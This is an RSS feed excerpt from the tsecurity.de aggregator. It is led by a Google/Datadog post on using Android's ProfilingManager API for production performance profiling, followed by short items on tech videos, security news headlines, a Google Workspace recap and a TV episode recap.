<title><![CDATA[Datadog delivers millions of in-depth performance insights with ProfilingManager]]></title>
<description><![CDATA[Posted by Alice Yuan, Developer Relations Engineer at Google, Arti Arutiunov, Product Manager at Datadog and Nikita Ogorodnikov, Staff Software Engineer at Datadog


  Performance regressions are notoriously hard to reproduce, making regressions a massive bottleneck for mobile developers. Althoug...]]></description>
<link>https://tsecurity.de/de/3693507/android-tipps/datadog-delivers-millions-of-in-depth-performance-insights-with-profilingmanager/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693507/android-tipps/datadog-delivers-millions-of-in-depth-performance-insights-with-profilingmanager/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:39 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[
<img src="https://blogger.googleusercontent.com/img/a/AVvXsEh92CmF7Hos-AKsEmr3k9Va10fhbed32pj4r9wxbUAlpyAIh2GV0KhvsRYzkmATQgflpHYdfAgdFkRfq1ki2G7ty5wKfzoaoyYknCOEjb6Auz7r0Zcfk0tR6VCX-3o3L9fpcs419uI5iNdBiOtno7ughGWD0SGJ5n3sfWPEB7ZJ9M_HQFDLhBQ_hv3HFQ8">
<p>Posted by Alice Yuan, Developer Relations Engineer at Google, Arti Arutiunov, Product Manager at Datadog and Nikita Ogorodnikov, Staff Software Engineer at Datadog</p><p></p><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjICmOZHTF4gmgXj1G4r5Fp48jM_W4fN9tjxbdnesvaxjUsuwmrftmILW-CErt5cXGcZp93UGtLy8fBehhZxwZ2oxtjQLNb269jHfkNA3XBHnn9JIVZbApeatdCi9gX6ylK7-5A-DzQ3VSRi8hJCNp_8699CzeD9H0y26Tl-6DO8FIafh9UQFyrpa_C9DA"><img alt="" data-original-height="1253" data-original-width="4209" src="https://blogger.googleusercontent.com/img/a/AVvXsEjICmOZHTF4gmgXj1G4r5Fp48jM_W4fN9tjxbdnesvaxjUsuwmrftmILW-CErt5cXGcZp93UGtLy8fBehhZxwZ2oxtjQLNb269jHfkNA3XBHnn9JIVZbApeatdCi9gX6ylK7-5A-DzQ3VSRi8hJCNp_8699CzeD9H0y26Tl-6DO8FIafh9UQFyrpa_C9DA=s16000"></a></div><br><br><p></p>

<p>
  Performance regressions are notoriously hard to reproduce, making regressions a massive bottleneck for mobile developers. Although signals like ANR rates indicate what issues occur in production, pinpointing the specific line of code that resulted in the performance issue has historically necessitated exhaustive manual reproduction or speculative trial-and-error experimentation.
</p>

<p>Datadog collaborated with Google to mitigate this frustration by integrating the ProfilingManager API (available on Android 15+ devices) into its Real User Monitoring (RUM) and Continuous Profiling platforms. This integration transforms the debugging workflow, allowing developers to move beyond surface-level symptoms to being able to detect the <em>why</em> behind a performance bottleneck.
</p>

By leveraging this system-level API, Datadog now processes millions of production profiles weekly across the globe according to Datadog internal data of June 2026. It provides engineering teams with a new level of visibility into real-world performance, all while maintaining a low runtime overhead for production-scale performance monitoring.

<h3>The impact of ProfilingManager</h3><p>
  ProfilingManager is a system service introduced in Android 15 that enables apps to programmatically collect performance data such as call stack samples, field traces and memory heap dumps directly from production environments. This capability shifts the engineering paradigm from reactive manual reproduction to proactive field analysis.</p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVOhdnTTwX9DT3ROPHDLHKm1aJ8Z0vo5wYsHTULe7oRBqsi2-pTblEC1ggNuVXdd5rCZv6RooG4dsdOqMM_8URLUxierH3KjujbTyVSFrqNIs01zMqb_o7uXFeYECms5s_CkX1WvAPaQeO5W9bpnvD4S4BNN0mH9qbanuTukvCg8LTozhNEhY0CQ0o0Q/s1280/AANDDM_DataDog_Quote_01.png"><img alt="ProfilingManager is a highly performant solution for code-level insights.  Of the solutions we evaluated, it has the lowest runtime overhead,  gives deep visibility into Java, Kotlin, and C++ traces, and opens the door to gather memory profiles and system-level traces during critical moments like ANRs and out-of-memory (OOM) errors. Yi Lu, Senior Engineer at Datadog" border="0" data-original-height="720" data-original-width="1280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWVOhdnTTwX9DT3ROPHDLHKm1aJ8Z0vo5wYsHTULe7oRBqsi2-pTblEC1ggNuVXdd5rCZv6RooG4dsdOqMM_8URLUxierH3KjujbTyVSFrqNIs01zMqb_o7uXFeYECms5s_CkX1WvAPaQeO5W9bpnvD4S4BNN0mH9qbanuTukvCg8LTozhNEhY0CQ0o0Q/s16000/AANDDM_DataDog_Quote_01.png"></a></div><br><p><br></p>

For example, a Google communications app used field traces to investigate why its cold start times were slower on newer, more powerful hardware. By diving into the field-collected traces and comparing traces across different device types, the engineer discovered a hidden scheduling issue: a background text-to-speech service was unnecessarily being prewarmed during app startup. The traces revealed that this background process was monopolizing the device's highest-performing big CPU core, forcing the app's main thread to sleep while the prewarm occurred.

<h3>Solving the Android code-level visibility challenge</h3><p>
  Prior to the implementation of ProfilingManager, Datadog’s Real User Monitoring (RUM) focused on high-level application health and session-level telemetry to assess the user journey. Engineering teams could monitor Android performance signals like time to initial display, ANR rates, CPU load, and frozen frames. These insights extended to granular interactions, such as network latency, touch events, and main thread hangs. However, while this data effectively highlighted which performance bottlenecks were surfacing in the field, it provided no clear path to identifying the root cause of these failures.</p><div><span face='"Google Sans", sans-serif'><br></span></div><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjW4Lm-zE5X2trjidQ0eh9i_Bhiwd7HnkOcMeRtA_4dABpGG0EPuer564cLFK4o3eb_N_zWmBAgpOa58eygLH5hwFF6kMg_4GFC98vRN4pd1LNZ-PG9W5wyHv-ptVcmIGo1M7FNPi9PKQ9iGsyZeVfr5jDK46HJHU-1Gsc6IZJdSvhrZVavqKiZmyYar0o"><img alt="We realized that across our profiling features, performance profiling on mobile applications remained a blind spot. Teams could see that an Android user experienced a slow screen render or an ANR, but lacked the same code-level visibility they relied on for their backend services. - Bryan Antigua, Senior Product Manager at Datadog" data-original-height="720" data-original-width="1280" src="https://blogger.googleusercontent.com/img/a/AVvXsEjW4Lm-zE5X2trjidQ0eh9i_Bhiwd7HnkOcMeRtA_4dABpGG0EPuer564cLFK4o3eb_N_zWmBAgpOa58eygLH5hwFF6kMg_4GFC98vRN4pd1LNZ-PG9W5wyHv-ptVcmIGo1M7FNPi9PKQ9iGsyZeVfr5jDK46HJHU-1Gsc6IZJdSvhrZVavqKiZmyYar0o=s16000"></a></div><br><br><p></p>

<p>
  To address this, Datadog needed a profiling engine capable of capturing Android traces directly from devices in production with minimal performance impact. After evaluating alternative approaches, such as writing their own trace processor using Android Debug APIs, the team selected ProfilingManager because it is the most performant solution of the profiling options they evaluated and offloads the sampling decisions overhead to the OS.
</p>

<p>
  ProfilingManager supports a wide range of collection methods, including CPU traces, call stack sampling, memory analysis through Java heap dumps and native heap profiles. It enables developers to profile production builds, upload trace files to external storage, and review them in the Perfetto trace analyzer UI. As a SaaS provider, Datadog uploads, visualizes, and analyzes these profiles collected via its SDK, providing a unified view of application health. 
</p>

By centralizing high-fidelity telemetry within a unified observability API, ProfilingManager empowers Datadog and its clients to proactively monitor, investigate, and remediate complex Android performance regressions through key technical advantages:

<ul>
  <li>
    <strong>Granular session diagnostics:</strong> ProfilingManager enhances debuggability by delivering direct OS-level trace data, overcoming the visibility and alignment challenges typical of custom logging with system services. To dive deeper, developers can download these traces from Datadog to investigate further in visualization tools like the <a href="https://ui.perfetto.dev/">Perfetto UI</a>. 
  </li>
  <li>
    <strong>Automated telemetry triggers:</strong> By leveraging native system events to initiate trace recordings at key optimization points, Datadog reduces the need to build custom collection logic. While the initial rollout focuses on the <a href="https://developer.android.com/reference/android/os/ProfilingTrigger?_gl=1*xix6h8*_up*MQ..*_ga*MTc4ODI2NDgwMy4xNzc5MzE2ODcw*_ga_6HH9YJMN9M*czE3NzkzMTY4NzAkbzEkZzAkdDE3NzkzMTY4NzAkajYwJGwwJGgyMTE1NzIyNjk1#TRIGGER_TYPE_APP_FULLY_DRAWN">APP_FULLY_DRAWN </a>signal, there are already plans to expand this observability to include <a href="https://developer.android.com/reference/android/os/ProfilingTrigger?_gl=1*1hl4p7n*_up*MQ..*_ga*MTc4ODI2NDgwMy4xNzc5MzE2ODcw*_ga_6HH9YJMN9M*czE3NzkzMTY4NzAkbzEkZzAkdDE3NzkzMTY4NzAkajYwJGwwJGgyMTE1NzIyNjk1#TRIGGER_TYPE_ANR">ANR</a>, <a href="https://developer.android.com/reference/android/os/ProfilingTrigger?_gl=1*8x3pd*_up*MQ..*_ga*MTc4ODI2NDgwMy4xNzc5MzE2ODcw*_ga_6HH9YJMN9M*czE3NzkzMTY4NzAkbzEkZzAkdDE3NzkzMTY4NzAkajYwJGwwJGgyMTE1NzIyNjk1#TRIGGER_TYPE_OOM">OOM</a>, and <a href="https://developer.android.com/reference/android/os/ProfilingTrigger?_gl=1*1ezx2ma*_up*MQ..*_ga*MTc4ODI2NDgwMy4xNzc5MzE2ODcw*_ga_6HH9YJMN9M*czE3NzkzMTY4NzAkbzEkZzAkdDE3NzkzMTY4NzAkajYwJGwwJGgyMTE1NzIyNjk1#TRIGGER_TYPE_COLD_START">COLD_START</a> triggers.</li>
  <li>
    <strong>Proactive trace snapshots:</strong> By interfacing directly with the system-level Perfetto service (traced), ProfilingManager utilizes a proactive background recording model designed to capture unpredictable issues. This ensures that developers receive a precise visualization of the events leading up to a performance anomaly, offering a level of insight that exceeds what is possible through manual instrumentation. 
  </li>
  <li>
    <strong>Bottleneck detection at scale:</strong> Datadog is able to synthesize telemetry from across Datadog’s global customer base to uncover regressions that only emerge under unique hardware configurations and variable network environments.
  </li>
  <li>
    <strong>System-enforced resource stability:</strong> The API leverages sampling trace collection to ensure performance and user experience impacts remain unnoticeable.
  </li>
  <li>
    <strong>On-device data controls:</strong> ProfilingManager filters out irrelevant information from other processes on-device before the profile is delivered to the app. This minimizes file sizes and ensures that only data relevant to the app's processes is provided.</li>
</ul>

<h3>Processing millions of weekly profiles to optimize real-world apps</h3><p></p><div class="separator"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr2ikpIrv_Km0RiIq-khGPFHpfA5CRYHfnLj2oRxLSuTk2x8qJFoO4UyNiwMpJphecSAVR4aWcJEB7BzvkXYjkyDggRDUYhLTBGhoj5q3b6BmwA5IcsER1_k5tffie6pteW3YNkIwI5Y6rG_Ie35Xzzq-mEnfq8iinA_cd_r5ydCxfRwajPSngrY1591k/s3464/datadog-profiling-blogpost-final.png"><img border="0" data-original-height="1686" data-original-width="3464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr2ikpIrv_Km0RiIq-khGPFHpfA5CRYHfnLj2oRxLSuTk2x8qJFoO4UyNiwMpJphecSAVR4aWcJEB7BzvkXYjkyDggRDUYhLTBGhoj5q3b6BmwA5IcsER1_k5tffie6pteW3YNkIwI5Y6rG_Ie35Xzzq-mEnfq8iinA_cd_r5ydCxfRwajPSngrY1591k/s16000/datadog-profiling-blogpost-final.png"></a></div><i><div><i>An example of Datadog's time to initial display measurement with </i></div><div><i>stack sampling powered by ProfilingManager</i></div></i><br>Integrating a system-level profiling API into a global monitoring SDK required solving infrastructure challenges. Because ProfilingManager generates highly detailed performance traces, the Datadog engineering team had to build a pipeline capable of parsing and analyzing these profiles on the server side at scale. <span><span>Beyond profile collection, Datadog also emphasizes the importance of balancing sampling frequency with collecting enough data to generate meaningful insights about your application. </span></span>Datadog relies on ProfilingManager’s built-in rate limiting as a critical stability safeguard, preventing excessive telemetry requests from overburdening user devices.<br><br>The team has been profiling Datadog's own native Android application and a number of early adopters’ applications for months, gathering millions of profiles to ensure a fast, error-free launch experience and to refine their performance-detection algorithms. Today, the production integration seamlessly scales across a variety of Android devices. <p></p><h3>Conclusion</h3><p>By integrating Android’s ProfilingManager API, Datadog successfully closed the visibility gap between backend systems and mobile client applications for their customers. By processing millions of profiles weekly with negligible device overhead, Datadog equips Android developers with the code-level insights necessary to diagnose complex performance bugs instantly, helping developers build smoother applications and improve their app’s performance signals in the Play Store. To adopt the ProfilingManager API directly into your performance observability framework, check out our <a href="https://developer.android.com/topic/performance/tracing/profiling-manager/overview">documentation</a>.</p>

<p>
  In the future, Datadog aims to make Android profiling data a first-class input for coding agents to autonomously resolve performance bottlenecks, closing the feedback loop between detection and remediation. Datadog is working toward making Android profiling broadly accessible to developers.
</p>

<p>
  To get started using the Datadog real user monitoring feature powered by ProfilingManager, visit <a href="https://www.datadoghq.com/dg/real-user-monitoring/android-profiling/?utm_source=inbound&amp;utm_medium=corpsite-display&amp;utm_campaign=int-rum-ww-blog-announcement-announcement-androidprofilerblog2026">Datadog Mobile Real User Monitoring</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[MIT's 1000TB/s Photonic Chip Finally Puts an End to NVIDIA's AI Domination!]]></title>
<description><![CDATA[Author: Evolving AI - Bewertung: 215x - Views:5447 MIT engineers are building a chip reaching one petabit per second. See how this hardware processes data faster than any current consumer tech. This video examines the technical details behind the new MIT processor chip designed to push data limit...]]></description>
<link>https://tsecurity.de/de/3693219/videos/mits-1000tbs-photonic-chip-finally-puts-an-end-to-nvidias-ai-domination/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693219/videos/mits-1000tbs-photonic-chip-finally-puts-an-end-to-nvidias-ai-domination/</guid>
<pubDate>Sat, 25 Jul 2026 08:35:34 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Evolving AI - Bewertung: 215x - Views:5447 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/NWKjnuND7Ys?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>MIT engineers are building a chip reaching one petabit per second. See how this hardware processes data faster than any current consumer tech. This video examines the technical details behind the new MIT processor chip designed to push data limits. We explore how researchers are utilizing interferometer technology to achieve speeds of a thousand terabits on a surface thinner than a human hair. This breakdown is for engineers, students, and tech enthusiasts interested in the future of high-speed hardware. By analyzing the electronic components and the specific measurement diagrams, you will better understand the engineering hurdles involved in reaching a petabit per second. You will see how this data processing speed milestone compares to existing silicon-based architectures and why this specific design is capable of such massive throughput.<br />
<br />
Subscribe for weekly engineering breakdowns, and comment below if you want to see a deep dive on how interferometers are used in modern computing.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Would an AI Kill Switch Backfire?]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:1 Some policymakers have proposed mechanisms that could disable or restrict advanced AI systems under certain circumstances. Supporters view these as safeguards against dangerous behavior, while critics argue they could introduce ne...]]></description>
<link>https://tsecurity.de/de/3692645/it-security-video/would-an-ai-kill-switch-backfire/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692645/it-security-video/would-an-ai-kill-switch-backfire/</guid>
<pubDate>Sat, 25 Jul 2026 00:03:21 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:1 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/4HJD39GiThA?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Some policymakers have proposed mechanisms that could disable or restrict advanced AI systems under certain circumstances. Supporters view these as safeguards against dangerous behavior, while critics argue they could introduce new security, governance, and trust concerns.<br />
<br />
If users believe an AI system can be disabled whenever authorities decide it's "rogue," confidence in that platform may decline. Organizations and individuals could migrate to alternatives they perceive as more independent, even if those systems introduce different risks.<br />
<br />
Is an AI kill switch a necessary safety measure, or does it create a larger trust problem than it solves?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#AISafety #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rogue AI Vehicle Porn, OpenAI, Nudes, Clop, Patches, Oracle, Palo Alto, Aaran Leyland - SWN #601]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 Rogue AI Vehicle Porn, OpenAI, Nudes, Clop, Patches, Oracle, Palo Alto, Aaran Leyland, and More on this episode of the Security Weekly News.

Visit https://www.securityweekly.com/swn for all the latest episodes!

Show Notes: https...]]></description>
<link>https://tsecurity.de/de/3692559/it-security-video/rogue-ai-vehicle-porn-openai-nudes-clop-patches-oracle-palo-alto-aaran-leyland-swn-601/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692559/it-security-video/rogue-ai-vehicle-porn-openai-nudes-clop-patches-oracle-palo-alto-aaran-leyland-swn-601/</guid>
<pubDate>Fri, 24 Jul 2026 23:18:20 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:4 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/NbxuQxfjvBY?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Rogue AI Vehicle Porn, OpenAI, Nudes, Clop, Patches, Oracle, Palo Alto, Aaran Leyland, and More on this episode of the Security Weekly News.<br />
<br />
Visit https://www.securityweekly.com/swn for all the latest episodes!<br />
<br />
Show Notes: https://securityweekly.com/swn-601<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Zwei Probleme in perl-DBI (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3692545/unix-server/security-zwei-probleme-in-perl-dbi-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692545/unix-server/security-zwei-probleme-in-perl-dbi-suse/</guid>
<pubDate>Fri, 24 Jul 2026 23:16:40 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Rogue AI Vehicle Porn, OpenAI, Nudes, Clop, Patches, Oracle, Palo Alto, Aaran Leyland - SWN #601]]></title>
<description><![CDATA[Rogue AI Vehicle Porn, OpenAI, Nudes, Clop, Patches, Oracle, Palo Alto, Aaran Leyland, and More on this episode of the Security Weekly News. Visit https://www.securityweekly.com/swn for all the latest episodes! Show Notes: https://securityweekly.com/swn-601]]></description>
<link>https://tsecurity.de/de/3692520/it-security-nachrichten/rogue-ai-vehicle-porn-openai-nudes-clop-patches-oracle-palo-alto-aaran-leyland-swn-601/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692520/it-security-nachrichten/rogue-ai-vehicle-porn-openai-nudes-clop-patches-oracle-palo-alto-aaran-leyland-swn-601/</guid>
<pubDate>Fri, 24 Jul 2026 23:13:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Rogue AI Vehicle Porn, OpenAI, Nudes, Clop, Patches, Oracle, Palo Alto, Aaran Leyland, and More on this episode of the Security Weekly News.</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/swn">https://www.securityweekly.com/swn</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/swn-601">https://securityweekly.com/swn-601</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laundry Bear gets the spin cycle.]]></title>
<description><![CDATA[Laundry Bear snuffles through unpatched Zimbra Collaboration servers. The State Department puts visa restrictions on cybercriminals. Oracle drops a record 1,449 security patches. Researchers disclose a critical vulnerability in OpenAI’s ChatGPT Workspace Agents. A new benchmark evaluates frontier...]]></description>
<link>https://tsecurity.de/de/3692479/it-security-nachrichten/laundry-bear-gets-the-spin-cycle/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692479/it-security-nachrichten/laundry-bear-gets-the-spin-cycle/</guid>
<pubDate>Fri, 24 Jul 2026 22:38:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Laundry Bear snuffles through unpatched Zimbra Collaboration servers. The State Department puts visa restrictions on cybercriminals. Oracle drops a record 1,449 security patches. Researchers disclose a critical vulnerability in OpenAI’s ChatGPT Workspace Agents. A new benchmark evaluates frontier AI model malware reverse engineering. LunchPoke uses the Notepad++ application to establish persistence. A Swiss rail manufacturer refuses to pay the ransom. Dave Bittner sits down with Maria Varmazis, host of T-Minus Space Cyber Briefing, to discuss the show's evolution into CyberWire's weekly space cyber briefing. The AI goes to space.]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Workspace Weekly Recap - July 24, 2026]]></title>
<description><![CDATA[Import and create combo charts in Google SheetsGoogle Sheets now offers enhanced support for combo charts, providing a more seamless experience when creating multi-series visualizations. | Learn more.A centralized hub for meeting resources on the new Google Meet homepageFinding the right notes or...]]></description>
<link>https://tsecurity.de/de/3692423/web-tipps/google-workspace-weekly-recap-july-24-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692423/web-tipps/google-workspace-weekly-recap-july-24-2026/</guid>
<pubDate>Fri, 24 Jul 2026 21:50:50 +0200</pubDate>
<category>Web Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Import and create combo charts in Google Sheets</h3><p>Google Sheets now offers enhanced support for combo charts, providing a more seamless experience when creating multi-series visualizations. | <a href="https://workspaceupdates.googleblog.com/2026/07/import-and-create-combo-charts-in-Google-Sheets.html" target="_blank">Learn more</a>.</p><h3>A centralized hub for meeting resources on the new Google Meet homepage</h3><p>Finding the right notes or attachments for a meeting shouldn't feel like a scavenger hunt. We’re introducing a revamped Google Meet homepage on the web to help you stay organized and prepared throughout your entire meeting workflow. | <a href="https://workspaceupdates.googleblog.com/2026/07/a-centralized-hub-for-meeting-resources-on-the-new-Google-Meet-homepage.html" target="_blank">Learn more</a>.</p><h3>Redesigned Google Classroom homepage with tailored views based on user’s role</h3><p>Soon, Google Classroom will introduce a redesigned homepage globally across all editions to help teachers, students, and administrators easily find relevant content, resources, and tools tailored to their specific roles. | <a href="https://workspaceupdates.googleblog.com/2026/07/redesigned-google-classroom-homepage-with-tailored-views-based-on-users-role.html" target="_blank">Learn more</a>.</p><h3>Gemini Alpha is now Gemini Beta</h3><p>We’re updating the name of the Gemini Alpha program to "Gemini Beta." This new name more accurately reflects both the scale and the quality of the features that enter this launch stage. Please note that this is solely a branding change. This update does not alter any customer configurations, data privacy constraints, or pricing tiers. | <a href="https://workspaceupdates.googleblog.com/2026/07/gemini-alpha-is-now-gemini-beta.html" target="_blank">Learn more</a>.</p><h3>Google Meet now organizes your meeting notes, transcripts, and recordings in your Google Drive</h3><p>We’re making it easier for users to find meeting notes, transcripts and recordings in Google Drive. | <a href="https://workspaceupdates.googleblog.com/2026/07/google-meet-now-organizes-your-meeting-notes-transcripts-and-recordings-in-your-Google-Drive.html" target="_blank">Learn more</a>.</p><h3>View supporting calendar delegates in meeting guest list</h3><p>When viewing a guest list in Google Calendar on the web, you will now see a new icon next to leaders who have a calendar delegate assisting them with scheduling support. Hovering over the icon will display the person’s information, allowing you to easily initiate a chat with them directly. | <a href="https://workspaceupdates.googleblog.com/2026/07/view-supporting-calendar-delegates-in-meeting-guest-list.html" target="_blank">Learn more</a>.</p><p><span>The announcements above were published on the Workspace Updates blog over the last week. Please refer to the original blog posts for complete details.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[MacStories Weekly: Issue 523]]></title>
<description><![CDATA[This week, in addition to the usual links, app debuts, and recap of MacStories' articles and podcasts:Every Cloud Continues the Trend of Clever Weather Apps, by JonathanA Pair of Pinning Pointers, by John
	
						This Story is for Club Members

				Get weekly newsletters, exclusive stories, membe...]]></description>
<link>https://tsecurity.de/de/3692288/ios-mac-os/macstories-weekly-issue-523/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692288/ios-mac-os/macstories-weekly-issue-523/</guid>
<pubDate>Fri, 24 Jul 2026 20:27:31 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<nav class="ms-issue-toc"><p>This week, in addition to the usual links, app debuts, and recap of MacStories' articles and podcasts:</p><ul><li><a href="https://www.macstories.net/club/macstories-weekly-issue-523/#every-cloud-continues-the-trend-of-clever-weather-apps" class="ms-issue-toc-item">Every Cloud Continues the Trend of Clever Weather Apps, by Jonathan</a></li><li><a href="https://www.macstories.net/club/macstories-weekly-issue-523/#a-pair-of-pinning-pointers" class="ms-issue-toc-item">A Pair of Pinning Pointers, by John</a></li></ul></nav>
	<div class="club-notice-restricted plan-">
						<h2>This Story is for Club Members</h2>

				<p>Get weekly newsletters, exclusive stories, member downloads, and ad-free version of MacStories Unwind.</p>
				<p><br><a href="https://www.macstories.net/plans?utm_source=ms&amp;utm_medium=web" class="button">See Plans</a></p>

									 

					<p>Already a member? <a href="https://www.macstories.net/?memberful_endpoint=auth">Sign in</a></p>
								</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Lucky’ Season 1 Episode 3 Recap: Lucky Finally Tracks Down Cary]]></title>
<description><![CDATA[“Lucky” Season 1, Episode 3 follows Lucky as she searches for Cary and the stolen money, using every trick she learned during her unusual childhood. The episode, titled “Read the Room,” also reveals that Agent Billie Rand’s pursuit of Priscilla has become deeply personal.



“Lucky” is a seven-ep...]]></description>
<link>https://tsecurity.de/de/3692287/ios-mac-os/lucky-season-1-episode-3-recap-lucky-finally-tracks-down-cary/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692287/ios-mac-os/lucky-season-1-episode-3-recap-lucky-finally-tracks-down-cary/</guid>
<pubDate>Fri, 24 Jul 2026 20:27:30 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[“Lucky” Season 1, Episode 3 follows Lucky as she searches for Cary and the stolen money, using every trick she learned during her unusual childhood. The episode, titled “Read the Room,” also reveals that Agent Billie Rand’s pursuit of Priscilla has become deeply personal.



“Lucky” is a seven-episode Apple TV limited series based on Marissa Stapley’s novel. The first two episodes arrived on July 15, followed by weekly releases through August 19.




Episode title: Read the Room



Release date: July 22, 2026



Runtime: 45 minutes




Spoiler warning for “Lucky” Episode 3



After the failed multimillion-dollar robbery, Lucky remains separated from Cary, who disappeared with their money. She also continues running from Priscilla’s people and the FBI while relying on the criminal skills taught to her by her father, John.



Episode 3 begins with a flashback showing John completing a deal for Priscilla as Agent Rand watches nearby. Lucky warns John that the situation will end badly. In the present, Rand follows Lucky’s trail through gas-station security footage, although she remains several steps behind her.



Lucky reaches Priscilla’s farm and hides while Dutch questions Noah about fake identification documents. Dutch eventually kills him, allowing Lucky to steal Noah’s identification and search for the person making the fake documents.



Lucky crashes a child’s birthday party



Before continuing her search, Lucky enters a child’s birthday party to obtain clothes, money and transportation. A flashback shows John teaching young Lucky how to steal at such events, including taking cash envelopes and unattended purses.



Lucky leaves the party with a new outfit, enough money to tip a valet and someone else’s car. The scene shows how easily she can enter an unfamiliar environment, gain people’s trust and disappear before anyone notices what happened.



At Noah’s home, Lucky discovers that his neighbour creates fake IDs. While studying her previous work, Lucky finds evidence that Cary used her services and adopted the name Colson Smith.



Lucky finally finds Cary



Lucky manipulates a real-estate agent into giving her access to the property where Cary is staying. While Cary swims nearby, she searches the house and discovers a gun and a laptop protected by a 12-word seed phrase.



Cary returns to find the property destroyed and Lucky waiting inside. Meanwhile, Wayne tells Priscilla that he has also discovered Cary’s location, placing both Cary and Lucky in immediate danger.



Episode 3 ends with the former partners finally reunited, although their missing money and broken trust remain unresolved. What do you think Cary will tell Lucky, and will they work together against Priscilla? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Preisgabe von Informationen in perl-libwww-perl (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3692079/it-security-nachrichten/preisgabe-von-informationen-in-perl-libwww-perl-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692079/it-security-nachrichten/preisgabe-von-informationen-in-perl-libwww-perl-suse/</guid>
<pubDate>Fri, 24 Jul 2026 18:39:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Security: Zwei Probleme in perl-DBI (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3692064/unix-server/security-zwei-probleme-in-perl-dbi-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692064/unix-server/security-zwei-probleme-in-perl-dbi-suse/</guid>
<pubDate>Fri, 24 Jul 2026 18:32:56 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[AI's Biggest Hidden Security Flaw]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 2x - Views:12 Modern LLMs process prompts by predicting the next token from context. They don't inherently distinguish system instructions from user instructions, and many "reasoning" models use the same underlying architecture while producing...]]></description>
<link>https://tsecurity.de/de/3691785/it-security-video/ais-biggest-hidden-security-flaw/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691785/it-security-video/ais-biggest-hidden-security-flaw/</guid>
<pubDate>Fri, 24 Jul 2026 16:22:44 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
